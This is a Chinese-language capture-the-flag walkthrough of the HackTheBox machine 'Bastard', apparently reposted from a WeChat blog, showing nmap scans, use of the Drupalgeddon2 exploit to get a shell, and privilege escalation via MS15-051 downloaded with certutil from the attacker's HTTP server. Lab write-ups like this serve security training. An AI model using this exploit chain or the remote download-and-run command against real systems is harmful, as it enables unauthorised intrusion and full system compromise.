靶机信息
靶机地址:
https://app.hackthebox.com/machines/Bastard
靶场: HackTheBox.com
靶机名称:Bastard
难度: 中等
提示信息:
无
目标: user.txt和root.txt
实验环境
攻击机:Kali 10.10.16.3
靶机:10.10.10.9
信息收集
扫描端口
扫描靶机开放的服务端口
sudo masscan -p1-65535 -i tun0 10.10.10.9 --max-rate 1000
sudo nmap -sC -sV -p 80,135,49154 -O 10.10.10.9 -oN nmap.log
从扫描结果中看到80端口由IIS7.5开启的并且存在robots.txt文件,先来看看80端口
Web渗透
访问后来到登录页面,通过logo和页面下方的提示均可知道CMS程序是Drupal,在nmap扫描结果的robots.txt内容中有版本变更文件CHANGELOG.txt,访问看看来确认版本
发现版本为Drupal 7.54,通过搜索引擎查找是否存在漏洞
https://github.com/dreadlocked/Drupalgeddon2
下载exp
git clone https://github.com/dreadlocked/Drupalgeddon2.git
验证exp
sudo gem install highline
ruby drupalgeddon2.rb http://10.10.10.9 --authentication
运行后出现 几个提示要求输入内容,一路回车不用管
经过exp的不懈努力拿到了shell,先找找flag
type c:usersdimitrisdesktopuser.txt
拿到user.txt,再来看看如何提权
systeminfo
这是一台Windows Server 2008 R2数据中心系统,并且未打过任何补丁,找个内核提权的exp来验证下
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051
下载这个exp并验证
proxychains wget https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS15-051/MS15-051-KB3045171.zip
unzip MS15-051-KB3045171.zip
cd MS15-051-KB3045171
ls
1。在exp目录下开启HTTP服务
py3 -m http.server
2。靶机上下载exp并执行
certutil.exe -urlcache -split -f http://10.10.16.3:8000/ms15-051x64.exe
验证成功,可以通过这个exp来执行system权限,来找找root的flag
ms15-051x64.exe "cmd /c type c:Usersadministratordesktoproot.txt"
拿到root.txt,游戏结束
原文始发于微信公众号(伏波路上学安全):渗透测试靶机练习No.125 HTB:Bastard(OSCP Prep)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论